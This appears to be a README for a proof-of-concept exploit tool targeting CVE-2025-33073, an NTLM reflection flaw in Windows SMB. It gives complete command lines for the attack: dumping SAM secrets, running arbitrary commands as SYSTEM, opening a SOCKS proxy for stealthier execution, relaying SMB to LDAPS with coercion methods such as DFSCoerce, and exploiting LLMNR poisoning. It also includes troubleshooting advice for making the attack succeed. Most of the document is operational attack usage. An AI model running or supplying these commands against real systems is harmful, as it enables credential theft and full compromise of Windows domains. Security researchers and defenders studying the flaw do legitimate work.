PoC Exploit for the NTLM reflection SMB flaw.
All credits go to the offical research:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
OS: Kali Linux (has most packages pre-installed).
- NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
- impacket-ntlmrelayx
- dnstool.py (included in repo)
The tool will automatically use a virtual environment. To set it up, run:
./setup.shThis will create a virtual environment and install all required dependencies including ldap3-bleeding-edge==2.10.1.1337.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
Custom command
Instead of running secretsdump a custom command can be executed.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"
SOCKS
For more stealthy execution of commands after valid connection as SYSTEM has been made. --target and --target-ip should be equal here.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
Also a custom command can be ran through proxychains instead of dumping SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
Research has been performed to see if the reflection really didnt work with SMB signing enabled which resulted in finding bugs where if SIGN/SEAL are removed from the packet it is possible to relay from SMB to LDAPS which is usually not possible due to MIC.
Thanks to:
- https://github.com/decoder-it/impacket-partial-mic/
- https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
- https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record.
- I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali. If Kali is not using the DNS server or you get a '/ FAILED' message from impacket-ntlmrelayx try adding the host to your /etc/hosts file. This should result in the attack working.
- If using IP the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of failure. It's until now not perfectly clear why this happens. I think it has something to do with networking.
- Try another coerce method using -M or --method.
Local NTLM authentication takes place
Local NTLM authentication does not take place resulting in a FAILED attempt
- DNS-record should also be known to the client, this can take more time in some occasions. With more time I mean give it a couple of minutes.
- This is just a PoC which means AV/EDR bypasses have not been tried to bypass. Use at own risk.
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073